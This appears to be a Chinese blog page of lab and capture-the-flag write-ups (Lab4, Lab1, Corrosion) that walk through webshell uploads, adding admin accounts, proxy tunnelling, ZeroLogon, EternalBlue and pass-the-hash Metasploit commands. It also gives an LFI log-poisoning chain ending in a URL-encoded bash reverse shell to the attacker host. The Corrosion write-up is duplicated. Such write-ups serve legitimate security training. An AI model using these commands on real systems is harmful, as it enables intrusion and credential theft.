rokki3 的文章

Lab4_wp

0 条评论 未分类 无标签 rokki3

Lab4 _WP

一、初始信息收集

  • VPN连接后访问网页,发现返回 404。
  • 使用 fscan 进行信息收集。
  • image-20250419161017028
  • 最终发现网页服务运行在 192.168.10.10:3590
  • image-20250419161040054

二、获取初始权限

  • 访问后台管理界面,猜测为/admin,尝试默认账号密码 admin/tao 成功登录。
  • 上传一句话木马,获取 WebShell,拿到第一个 flag。
  • image-20250419161055156
  • 使用 Cobalt Strike(CS)上线。
  • image-20250419161119397

三、横向移动准备

  • 开放目标主机的 3389 端口,并添加管理员账户。
  • image-20250419161127016
  • image-20250419161137093
  • image-20250419161147399
  • 通过远程桌面进行信息收集,发现目标为双网卡主机。
  • image-20250419161200516
  • 使用 fscan 对内网进一步扫描。
  • image-20250419161211062
  • image-20250419161222070

四、横向渗透

  • 使用 Stowaway 搭建代理通道。
  • image-20250419161234518
  • 访问内网地址 192.168.20.20:8055
  • image-20250419161243702
  • 根据题目提示,爆破遗留木马密码。
  • image-20250419161254318
  • image-20250419161301503
  • 成功使用蚁剑连接,获取第二个 flag。
  • image-20250419161308505

五、域控提权

  • 使用 Metasploit 尝试利用 MS17-010利用失败
  • image-20250419161315698
  • 改用 CVE-2020-1472(ZeroLogon)对域控进行提权。
  • image-20250419161322758
  • 成功抓取域控机器的 hash 值。
  • image-20250419161329525

六、PTH 攻击(Pass-the-Hash)

  • 使用抓取到的 hash 值进行 PTH 攻击。
  • image-20250419161337977
  • 成功获取第三个 flag。
  • image-20250419161345047

总结:

本次实验通过信息收集、权限提升、内网横向与域控提权等手段,完整完成三枚 flag 的获取过程。

Lab1_wp

0 条评论 未分类 无标签 rokki3

VPN连接后初始探测

  • 连接 OpenVPN 后,发现目标使用 易优CMS 框架。
  • image-20250405145201749

信息收集

  • 使用 fscan 工具进行信息收集。
  • image-20250405145220876
  • 发现存在 ThinkPHP 5.0.23 的 RCE 漏洞,使用工具进行验证
  • image-20250405145234189
  • 但无法getshell
  • image-20250405145250406

易优CMS 漏洞利用

  • 网上搜索易优CMS相关漏洞,发现一个 Nday 漏洞,支持从前台 getshell。
  • image-20250405145302329
  • 编写 POC,将一句话木马 使用 Base64 编码写入
  • image-20250405145315195

木马连接

  • 使用 蚁剑(AntSword) 连接成功。
  • image-20250405145333042找到第一个 flag
  • image-20250405145348645
  • image-20250405145401137

权限提升

  • 创建管理员用户,并打开 3389 远程桌面端口
  • image-20250405145416490
  • image-20250405145427021
  • image-20250405145436237
  • 成功远程连接桌面,上线 Cobalt Strike
  • image-20250405145448031

内网横向

  • 通过信息收集发现目标为 双网卡机器
  • image-20250405145502242
  • 使用 fscan 对内网进行扫描,发现192.168.20.20的主机为域控
  • image-20250405145524636
  • 配置 frp 内网代理。
  • image-20250405145542793
  • 配置代理环境,进入 msfconsole
  • image-20250405145555912

永恒之蓝(MS17-010)利用

  • 探测到目标存在 MS17-010 漏洞

  • image-20250405145634548

    利用模块如下:

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.20.30
set PAYLOAD windows/x64/meterpreter/bind_tcp  # 使用正向连接(目标在内网)
set LHOST 172.16.233.2  # 本机回连 IP(ifconfig 查看)
run

进行漏洞利用

image-20250405145728968

得到第三个flag

image-20250405145852045

PTH攻击

继续使用msf进行PTH攻击,得到第二个flag

use exploit/windows/smb/psexec
set RHOST 192.168.20.10
set SMBUser Administrator
set SMBPass 00000000000000000000000000000000:a167976f7bd8d93ee232fa7a87a4079e
run

Corrosion_wp

0 条评论 未分类 无标签 rokki3

基本信息

  • 靶机 IP:192.168.126.140
  • 攻击机 IP:192.168.126.132

信息收集阶段

端口扫描

使用 nmap 扫描靶机所有端口

image-20250407181941151

nmap -p 1-65535 192.168.126.140

结果:

  • 开放端口:
    • 22/tcp(SSH)
    • 80/tcp(HTTP)
    • image-20250407181953358

Web 服务枚举

访问 80 端口

  • 页面为默认的 Ubuntu 网站。
  • image-20250407182058505

使用 Gobuster 枚举目录

gobuster dir -u http://192.168.126.140 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

发现目录:

  • /tasks
  • /blog-post
  • image-20250407182113933

访问 /tasks

  • 存在 tasks_todo.txt 文件。
  • image-20250407182127446
  • 内容涉及 SSH 的提示。
  • image-20250407182136627

访问 /blog-post

  • 页面无明显信息。
  • image-20250407182147147

深入探测

​ 二次注入

image-20250407182210706

  • /blog-post/archives 目录中手动点击各个链接。
  • image-20250407182300274
  • 发现 randylogs.php,页面为空白。
  • image-20250407182312552

使用 ffuf 模糊测试

ffuf -u http://192.168.126.140/blog-post/archives/randylogs.php?file=FUZZ -w /usr/share/wordlists/dirb/common.txt

image-20250407182347710

结果:

  • 存在 文件包含漏洞
  • image-20250407182359469

文件包含漏洞利用

结合前面 SSH 的提示,考虑利用 SSH 登录污染 /var/log/auth.log,然后通过文件包含执行命令。

image-20250407182410434

  • 参考网上相关帖子,尝试三种思路,最终发现命令执行成功。
  • image-20250407182419748
  • image-20250407182441485
  • image-20250407182456203

准备监听反弹 Shell

在攻击机上运行:

nc -lvvp 4444

发起反弹 Shell 请求(需 URL 编码)

http://192.168.126.140/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=echo%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.126.132/4444%200%3E%261%22%20%7C%20bash

效果:

  • 成功反弹 shell。
  • image-20250407182516742

获取用户权限

查看目录结构

  • 发现 /backups 目录。
  • 其中包含 user_backup.zip 文件。

下载 zip 文件

使用 Python 启动 HTTP 服务:

python3 -m http.server 80

image-20250407182714665

浏览器访问:

http://192.168.126.140/backups/user_backup.zip

image-20250407182730112

破解 ZIP 密码

zip2john user_backup.zip > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
  • 成功爆破出密码。
  • image-20250407182743041

解压并查看内容

  • 获得 Randy 用户的登录密码。
  • image-20250407182752561

使用 SSH 登录

ssh randy@192.168.126.140
  • image-20250407182808547
  • 成功登录。
id
  • 确认为普通用户。
  • image-20250407182821340

查看用户 flag

cat user.txt
  • 成功获取 flag
  • image-20250407182836566

总结

  • 利用文件包含漏洞结合日志注入成功反弹 shell。
  • 破解备份文件获得 SSH 凭据,成功登录。
  • 获取 user.txt,完成用户权限阶段目标。

    渗透测试记录报告

基本信息

  • 靶机 IP:192.168.126.140
  • 攻击机 IP:192.168.126.132

信息收集阶段

端口扫描

使用 nmap 扫描靶机所有端口

image-20250407181941151

nmap -p 1-65535 192.168.126.140

结果:

  • 开放端口:
    • 22/tcp(SSH)
    • 80/tcp(HTTP)
    • image-20250407181953358

Web 服务枚举

访问 80 端口

  • 页面为默认的 Ubuntu 网站。
  • image-20250407182058505

使用 Gobuster 枚举目录

gobuster dir -u http://192.168.126.140 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

发现目录:

  • /tasks
  • /blog-post
  • image-20250407182113933

访问 /tasks

  • 存在 tasks_todo.txt 文件。
  • image-20250407182127446
  • 内容涉及 SSH 的提示。
  • image-20250407182136627

访问 /blog-post

  • 页面无明显信息。
  • image-20250407182147147

深入探测

二次注入

image-20250407182210706

  • 在 /blog-post/archives 目录中手动点击各个链接。
  • image-20250407182300274
  • 发现 randylogs.php,页面为空白。
  • image-20250407182312552

使用 ffuf 模糊测试

ffuf -u http://192.168.126.140/blog-post/archives/randylogs.php?file=FUZZ -w /usr/share/wordlists/dirb/common.txt

image-20250407182347710

结果:

  • 存在 文件包含漏洞
  • image-20250407182359469

文件包含漏洞利用

结合前面 SSH 的提示,考虑利用 SSH 登录污染 /var/log/auth.log,然后通过文件包含执行命令。

image-20250407182410434

  • 参考网上相关帖子,尝试三种思路,最终发现命令执行成功。
  • image-20250407182419748
  • image-20250407182441485
  • image-20250407182456203

准备监听反弹 Shell

在攻击机上运行:

nc -lvvp 4444


发起反弹 Shell 请求(需 URL 编码)

http://192.168.126.140/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=echo%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.126.132/4444%200%3E%261%22%20%7C%20bash

效果:

  • 成功反弹 shell。
  • image-20250407182516742

获取用户权限

查看目录结构

  • 发现 /backups 目录。
  • 其中包含 user_backup.zip 文件。

下载 zip 文件

使用 Python 启动 HTTP 服务:

python3 -m http.server 80

image-20250407182714665

浏览器访问:

http://192.168.126.140/backups/user_backup.zip

image-20250407182730112
破解 ZIP 密码

zip2john user_backup.zip > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
  • 成功爆破出密码。
  • image-20250407182743041

解压并查看内容

  • 获得 Randy 用户的登录密码。
  • image-20250407182752561

使用 SSH 登录

ssh randy@192.168.126.140
  • image-20250407182808547
  • 成功登录。
id
  • 确认为普通用户。
  • image-20250407182821340

查看用户 flag

cat user.txt
  • 成功获取 flag
  • image-20250407182836566

总结

  • 利用文件包含漏洞结合日志注入成功反弹 shell。
  • 破解备份文件获得 SSH 凭据,成功登录。
  • 获取 user.txt,完成用户权限阶段目标。